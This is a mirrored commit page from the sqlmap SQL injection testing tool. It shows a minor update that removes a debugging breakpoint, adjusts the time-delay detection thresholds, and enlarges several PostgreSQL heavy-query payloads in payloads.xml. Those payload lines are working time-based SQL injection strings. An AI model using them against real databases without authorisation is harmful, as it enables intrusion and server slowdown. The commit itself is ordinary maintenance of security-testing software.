sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-26 03:23:48 +03:00
Code Issues Packages Projects Releases Wiki Activity

minor update

Browse Source
This commit is contained in:
Miroslav Stampar 2010-12-07 08:05:03 +00:00
parent 90b776c1a2
commit 3d87489de5
3 changed files with 6 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
lib/controller/checks.py
View File

@ -46,7 +46,6 @@ from lib.core.exception import sqlmapUserQuitException
from lib.core.session import setString from lib.core.session import setString
from lib.core.session import setRegexp from lib.core.session import setRegexp
from lib.core.settings import TIME_MIN_DELTA from lib.core.settings import TIME_MIN_DELTA
from lib.core.settings import TIME_N_RESPONSE
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
from plugins.dbms.firebird.syntax import Syntax as Firebird from plugins.dbms.firebird.syntax import Syntax as Firebird
from plugins.dbms.postgresql.syntax import Syntax as PostgreSQL from plugins.dbms.postgresql.syntax import Syntax as PostgreSQL
@ -360,14 +359,11 @@ def checkSqlInjection(place, parameter, value):
injectable = True injectable = True
elif check == "[DELAYED]": elif check == "[DELAYED]":
if duration >= max(TIME_MIN_DELTA, TIME_N_RESPONSE * kb.responseTime): if duration >= max(TIME_MIN_DELTA, kb.responseTime):
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title) infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
logger.info(infoMsg) logger.info(infoMsg)
injectable = True injectable = True
else:
import pdb
pdb.set_trace()
# Restore old value of socket timeout # Restore old value of socket timeout
socket.setdefaulttimeout(popValue()) socket.setdefaulttimeout(popValue())

6
lib/core/settings.py
View File

@ -48,10 +48,8 @@ DUMP_STOP_MARKER = "__STOP__"
PAYLOAD_DELIMITER = "\x00" PAYLOAD_DELIMITER = "\x00"
# settings used for delayed time payloads # minimum difference of loading time in seconds for delayed time payloads
TIME_MIN_DELTA = 1 # minimum difference of loading time in seconds TIME_MIN_DELTA = 2
TIME_N_RESPONSE = 3 # minimum multiplicant of response time
# System variables # System variables
IS_WIN = subprocess.mswindows IS_WIN = subprocess.mswindows

6
xml/payloads.xml
View File

@ -1267,7 +1267,7 @@ Formats:
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<request> <request>
<payload>; SELECT [RANDNUM] WHERE EXISTS(SELECT * FROM GENERATE_SERIES(1, 3000000));</payload> <payload>; SELECT [RANDNUM] WHERE EXISTS(SELECT * FROM GENERATE_SERIES(1, 10000000));</payload>
<comment>--</comment> <comment>--</comment>
</request> </request>
<response> <response>
@ -1503,7 +1503,7 @@ Formats:
<clause>1,2,3</clause> <clause>1,2,3</clause>
<where>1</where> <where>1</where>
<request> <request>
<payload>AND EXISTS(SELECT * FROM GENERATE_SERIES(1, 3000000))</payload> <payload>AND EXISTS(SELECT * FROM GENERATE_SERIES(1, 10000000))</payload>
</request> </request>
<response> <response>
<time>[DELAYED]</time> <time>[DELAYED]</time>
@ -1658,7 +1658,7 @@ Formats:
<clause>1,2,3</clause> <clause>1,2,3</clause>
<where>2</where> <where>2</where>
<request> <request>
<payload>OR EXISTS(SELECT * FROM GENERATE_SERIES(1, 3000000))</payload> <payload>OR EXISTS(SELECT * FROM GENERATE_SERIES(1, 10000000))</payload>
</request> </request>
<response> <response>
<time>[DELAYED]</time> <time>[DELAYED]</time>